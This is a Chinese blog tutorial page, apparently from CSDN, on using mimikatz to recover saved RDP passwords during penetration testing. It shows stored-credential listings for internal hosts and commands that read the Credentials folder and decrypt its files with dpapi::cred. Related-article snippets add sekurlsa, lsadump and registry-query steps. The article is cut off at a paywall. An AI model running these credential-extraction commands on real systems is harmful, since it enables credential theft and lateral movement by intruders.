利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp

最新推荐文章于 2025-06-18 13:06:33 发布
原创 最新推荐文章于 2025-06-18 13:06:33 发布 · 1.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #html #前端 

目标: Domain:target=TERMSRV/192.168.100.52
类型: 域密码
用户: admin
本地机器持续时间

目标: LegacyGeneric:target=Adobe User Info(Part2)
类型: 普通 
用户: User DT
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/172.16.1.246
类型: 普通 
用户: administrator
本地机器持续时间

目标: Domain:target=TERMSRV/192.168.100.42
类型: 域密码
用户: admin
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.53
类型: 普通 
用户: lmrsec\tony
本地机器持续时间

目标: LegacyGeneric:target=Adobe User Info(Part1)
类型: 普通 
用户: User DT
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/192.168.100.45
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=Adobe User OS Info(Part1)
类型: 普通 
用户: User OS Info
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/172.16.1.134
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/192.168.100.46
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.54
类型: 普通 
用户: LMRSEC\lmr
本地机器持续时间    

目标: LegacyGeneric:target=TERMSRV/172.16.1.124
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.20.123
类型: 普通 
用户: pc
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.100
类型: 普通 
用户: lmrsec\tony
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.55
类型: 普通 
用户: LMRSEC\tony
本地机器持续时间        

目标: LegacyGeneric:target=TERMSRV/10.10.40.62
类型: 普通 
用户: MEC0\administrator
本地机器持续时间        

目标: Domain:target=192.168.1.94
类型: 域密码
用户: LEE-PC\admin

目标: Domain:target=10.0.0.152
类型: 域密码
用户: LEE-PC\administrator    

目标: LegacyGeneric:target=chia-user-chia-1.8
类型: 普通 
用户: wallet-user-chia-1.8-0    

目标: Domain:target=PIG
类型: 域密码
用户: LEE-PC\admin



使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials 来查看保存凭据的目录和凭据的值


![](https://img-blog.csdnimg.cn/aa6e78472c574299bba5f40ef7d5dacf.png)


接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。


例如:

mimikatz “dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D” exit >a.txt

mimikatz(commandline) # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A3

最低0.47元/天 解锁文章

200万优质内容无限畅学
获取RDP凭据密码
G3et的博客
02-06 1803
Windows 自带的远程桌面功能非常强大,并且被广泛使用。因此,获取远程桌面凭证可以为渗透测试中的横向移动提供有利条件。横向移动是指在已经渗透到网络内部的情况下,继续在网络内部渗透的过程。通过获取远程桌面凭证,攻击者可以在网络内部移动,以获取更高的权限和更多的系统访问权限。所以,在渗透测试中获取远程桌面凭证是一个很重要的步骤。如果用户在登录 RDP 时勾选了 “允许为我保存凭证” 选项,则在该用户本地将会生成一个凭证文件。
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4991
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
利用mimikatz查看rdp连接密码渗透测试
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
深入探究Mimikatz:Windows系统密码抓取工具
最新发布
weixin_42348783的博客
06-18 1038
Mimikatz是一个广泛使用的安全工具,它能够提取Windows系统中敏感信息,如密码、哈希值和Kerberos票据等。它在安全测试和渗透测试中扮演着重要角色,但同时也可能被滥用导致安全风险。Kerberos是广泛使用的网络认证协议,它通过使用密钥分布中心(KDC)来实现安全的用户和服务之间的认证。Kerberos协议允许用户通过证明自己知道密码的散列(即密钥)来进行认证,而不是明文密码本身,从而提供了双向认证和会话密钥的分发。
内网渗透:利用mimikatz查看rdp/3389连接密码
weixin_45612728的博客
01-29 4298
在做内网渗透的时候,往往有的时候如果能得到远程的rdp连接密码,做起横向渗透或者纵向渗透更加容易拿到shell.rdp密码为什么会被保存起来呢?是因为管理员的在连接的时候对信息凭据进行保存,所以会保存到本地的计算机当中,从而我们可以使用minikatz来进行读取密码的信息. 首先使用cmdkey /list来查看是否有保存的凭据密码信息. 2.使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials* 来查看保存凭据的目录和凭据的值.
RDP密码凭据抓取
Y22Lee的博客
05-15 1901
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
获取本地系统的 RDP 连接记录和密码详细步骤及注意事项
m0_57836225的博客
09-25 1988
获取本地系统的 RDP 连接记录可以通过查看事件日志或使用第三方工具来实现。但对于获取 RDP 密码,必须极其谨慎,确保有合法授权,并认识到其中的法律和安全风险。在进行任何系统管理或安全操作时,都应该遵守相关法律法规,以保护系统的安全和隐私。如果可能,应优先考虑使用安全的替代方法来进行远程访问和管理。
查看Windows凭据和普通凭据的密码查看Windows中存储的密码)——mimikatz
一碗单炒饭的专栏
02-10 7万+
使用mimikatz进行Windows中存储的密码查看 查看Windows为你管理的凭据 路径:控制面板\所有控制面板项\凭据管理器 软件下载 https://github.com/gentilkiwi/mimikatz/releases 下载完成后,以管理员方式运行mimikatz 查看Windows凭据 输入下方两个指令(#号后面的) mimikatz # privilege::debug...
mimikatz 2.2.0版本支持RDP-PTH验证
RDP-PTH攻击中,攻击者试图通过远程桌面连接利用已知的密码哈希值来获取目标系统的访问权限,而无需知道实际的密码。这是通过传递哈希值而非明文密码来实现认证的一种方法,大大降低了攻击的复杂性。 3. ...
mimikatz_trunk.zip
08-10
本文将详细介绍mimikatz的核心功能,以及如何利用2.2.0版本进行RDP-PTH验证,同时探讨其在Windows环境下的使用。 **mimikatz核心功能** 1. **密码获取**:mimikatz能够从系统内存中提取明文密码、NTLM哈希、...
【内网渗透】mimikatz 基本使用
君行路的博客
08-14 2457
文章目录前言1. 工具简介2. 提升权限 privilege::debug3. 抓取明文密码 sekurlsa::logonpasswords4. sekurlsa模块 获取密码信息4.1 procdump + mimikatz 加载dmp文件,并导出其中的明文密码4.2 导出lsass.exe进程中所有的票据 sekurlsa::tickets /export5. lsadump模块 读取域控中域成员Hash5.1 读取所有域用户的哈希 lsadump::lsa /patch5.2 查看域内指定用户信息,
RDP密码工具
12-12
这是一个快速加密解密rdp密码的一个工具,我们使用它可以很方便的设置密码和解密
RDP文件密码加解密
12-13
用于远程连接中的.rdp文件的password 51:b: 这个设置的明文密码和二进制哈希转换
远程桌面密码查看
09-08
远程桌面密码查看
密码抓取--获取已控机器本地保存的RDP密码
网络安全。
02-24 1万+
0x01 简介 在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。 0x02 获取已控机器本地保存的RDP密码 一、mimikatz 1、查看本地机器本地连接过的目标机器。 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
RDP连通测试(拨测)
wcyyyyyyy的博客
11-26 1098
RDP连通测试(拨测) 命令 使用xfreerdp命令可以进行连通测试,具体命令如下: xfreerdp /cert-ignore /v:ip:3389 /u:username /p:passwd +auth-only /sec:nla 执行此命令后可以通过返回的状态码来判断可否使用此账号密码连接目标的rdp端口。 返回值为0,则拨测成功 返回值为1,则拨测失败。账号密码错误 显示超时,则输入ip不通。 Unable to connect 则端口不通。 通过这几个不同的返回状态就可以做rdp的拨测
mimikatz抓取密码
G208_522的博客
10-26 5138
mimikatz抓取密码
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 1万+
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
查看域内RDP连接记录获取密码
weixin_43873557的博客
02-08 1472
https://github.com/3gstudent/List-RDP-Connections-History.git powershell -exec bypass ./ListAllUser.ps1 本地RDP连接密码解密 • Mimikatz 查看本地机器本地连接过的目标机器: reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /s 查看本地用户此目录下是否存有RDP密码文件: dir /
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值